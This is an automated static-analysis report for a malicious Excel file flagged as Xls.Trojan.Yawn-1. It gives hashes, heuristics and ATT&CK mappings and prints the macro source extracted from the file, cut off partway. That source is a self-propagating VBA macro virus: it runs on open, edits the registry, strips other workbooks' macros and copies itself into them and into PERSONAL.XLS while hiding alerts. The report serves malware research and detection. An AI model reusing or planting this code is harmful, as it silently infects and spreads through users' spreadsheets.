Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7b3308804c79d7c4…

MALICIOUS

Office (OLE)

26.0 KB Created: 2002-01-20 22:43:06 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 2a6c11260cb0b1ef1464d2ee2dc96b8d SHA-1: a04bc0f9c18da16ce9565481c16e103e9dea70f0 SHA-256: 7b3308804c79d7c42b1d877b4889ebd4188cd52dcdb5ad6fca92f1ebc04267f3
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is an Excel file containing VBA macros, specifically an Auto_Open macro, which is a common technique for malicious execution. The script attempts to write a DWORD value named 'Options6' to a specific registry key related to Excel, suggesting an attempt to establish persistence or modify application behavior. The ClamAV signature 'Xls.Trojan.Yawn-1' further supports its malicious nature.

Heuristics 2

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17330 bytes
SHA-256: 5e8649d38f536bf8dfaead5716e9325de21e676130ebb61b98983c1093a4effc
Detection
ClamAV: Xls.Trojan.Yawn-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "CQ"
Private Declare Function RegOpenKeyExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "ADVAPI32.DLL" (ByVal hKey As Long) As Long
Global Const REG_DWORD As Long = 4
Global Const HKEY_CURRENT_USER As Long = &H80000001
Dim ob1 As New Class1
Dim p As String
Dim AppS As String
'taitai
Private Sub auto_open()
    u = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0, KEY_ALL_ACCESS, k)
    u = RegSetValueExA(k, "Options6", 0, REG_DWORD, Chr$(0), 4)
    u = RegCloseKey(k)
    p = Application.PathSeparator
    AppS = Application.StartupPath
    DelMcr
    If UCase(ThisWorkbook.Name) = "PERSONAL.XLS" Then
        Application.OnSheetActivate = "ActOpf_Evt"
        ActOpf_Evt
    Else
        CkStrUP
    End If
End Sub
Private Sub ActOpf_Evt()
    Set ob1.app = Application
End Sub
Private Sub Chk_Opf()
    On Error GoTo h_er
    Application.DisplayAlerts = False
    Application.ScreenUpdating = False
    awn = ActiveWorkbook.Name
    If Left(Right(awn, 4), 3) = ".xl" Then
        aw_m_n = Chk_Mo_N(awn)
        If aw_m_n = "" Then
            n = Chk_Mo_N(ThisWorkbook.Name)
            cop_m (n)
            Workbooks(awn).Save
        Else
            m_n = ActiveWorkbook.VBProject.VBComponents(aw_m_n).CodeModule.Lines(9, 1)
            If m_n <> "'taitai" Then
                Set v_c = ActiveWorkbook.VBProject.VBComponents
                For i = v_c.Count To 1 Step -1
                    If v_c(i).Type = 1 Or v_c(i).Type = 2 Then
                        v_c.Remove v_c(i)
                    End If
                Next i
                n = Chk_Mo_N(ThisWorkbook.Name)
                cop_m (n)
                Workbooks(awn).Save
            End If
        End If
    End If
    Application.ScreenUpdating = True
    Application.DisplayAlerts = True
    Exit Sub
h_er:
End Sub
Private Sub CkStrUP()
    Application.DisplayAlerts = False
    Application.ScreenUpdating = False
     f1 = "PERSONAL.XLS"
    If UCase(Dir(AppS & p & f1)) <> f1 Then
        cre_f
    ElseIf chk_per = False Then
        Workbooks("Personal.xls").Close
        Kill AppS & p & f1
        cre_f
    Else
    End If
    Workbooks("Personal.xls").Close
    Workbooks.Open AppS & p & "Personal.xls"
    Application.Run "Personal.xls!ActOpf_Evt"
    Application.OnSheetActivate = "'" & AppS & p & f1 & "'!ActOpf_Evt"
    Application.DisplayAlerts = True
    Application.ScreenUpdating = True
End Sub
Private Function chk_per()
    arg = "'" & AppS & p & "[Personal.xls]Sheet1" & "'!" & _
        Range("C1").Range("A1").Address(, , xlR1C1)
    ModuleName1 = Chk_Mo_N("Personal.xls")
    If ar2 <> ModuleName1 Then
        chk_per = False
    Else
        chk_per = True
    End If
End Function
Private Function Chk_Mo_N(WkName)
On Error Resume Next
    Set a1 = Workbooks(WkName).VBProject.VBComponents
    For i = 1 To a1.Count
        If a1(i).Type = 1 Then
            Chk_Mo_N = a1(i).Name
            Exit For
        Else
            Chk_Mo_N = ""
        End If
    Next i
End Function
Private Sub cre_f()
    Workbooks.Add
    n = Chk_Mo_N(ThisWorkbook.Na
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.